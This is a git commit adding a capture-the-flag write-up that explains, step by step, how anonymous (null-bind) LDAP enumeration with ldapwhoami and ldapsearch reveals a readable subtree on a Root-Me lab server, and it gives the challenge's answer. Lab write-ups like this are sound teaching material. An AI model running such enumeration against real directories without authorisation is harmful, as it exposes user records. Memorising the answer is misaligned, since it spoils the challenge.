feat ldap-null-bind
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
This commit is contained in:
Tuan-Dat Tran
81
network/lda-null-bind/explaination.org
Normal file
81
network/lda-null-bind/explaination.org
Normal file
@@ -0,0 +1,81 @@
|
||||
* LDAP null-bind challenge explained simply
|
||||
|
||||
Think of LDAP like a big company phonebook/tree.
|
||||
|
||||
Each node in the tree is a folder or a person record:
|
||||
|
||||
#+begin_example
|
||||
dc=challenge01,dc=root-me,dc=org
|
||||
|
|
||||
+-- ou=anonymous
|
||||
|
|
||||
+-- uid=sabu
|
||||
+-- mail: sabu@anonops.org
|
||||
#+end_example
|
||||
|
||||
In this challenge, the server allows *anonymous login* (called a null bind).
|
||||
That means we can connect without a username/password and ask some questions.
|
||||
|
||||
** What we did (step by step)
|
||||
|
||||
1) Checked if anonymous access works
|
||||
|
||||
#+begin_src bash
|
||||
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||
#+end_src
|
||||
|
||||
It returned `anonymous`, so null bind is enabled.
|
||||
|
||||
2) Tried to list everything from the main base DN
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
#+end_src
|
||||
|
||||
Server replied with `Insufficient access`.
|
||||
|
||||
So: anonymous is allowed, but not everywhere.
|
||||
|
||||
3) Probed likely child branches under the base DN
|
||||
|
||||
We tested candidate DNs and found one readable branch:
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
|
||||
#+end_src
|
||||
|
||||
That confirmed `ou=anonymous` exists and is accessible.
|
||||
|
||||
4) Enumerated that readable branch
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
#+end_src
|
||||
|
||||
This returned a user record:
|
||||
|
||||
- `uid=sabu`
|
||||
- `mail: sabu@anonops.org`
|
||||
|
||||
So the requested email is:
|
||||
|
||||
*sabu@anonops.org*
|
||||
|
||||
** Why this works
|
||||
|
||||
- LDAP permissions are often set per branch (subtree).
|
||||
- Root/base queries may be blocked.
|
||||
- A specific subtree can still be world-readable.
|
||||
- Enumeration is about finding *where* read access is allowed.
|
||||
|
||||
** Tiny mental model
|
||||
|
||||
#+begin_example
|
||||
[Connect anonymously] --> [Test base DN] --blocked--> [Try child branches]
|
||||
|
|
||||
v
|
||||
[Find readable subtree]
|
||||
|
|
||||
v
|
||||
[Dump entries + get mail]
|
||||
#+end_example
|
||||
Reference in New Issue
Block a user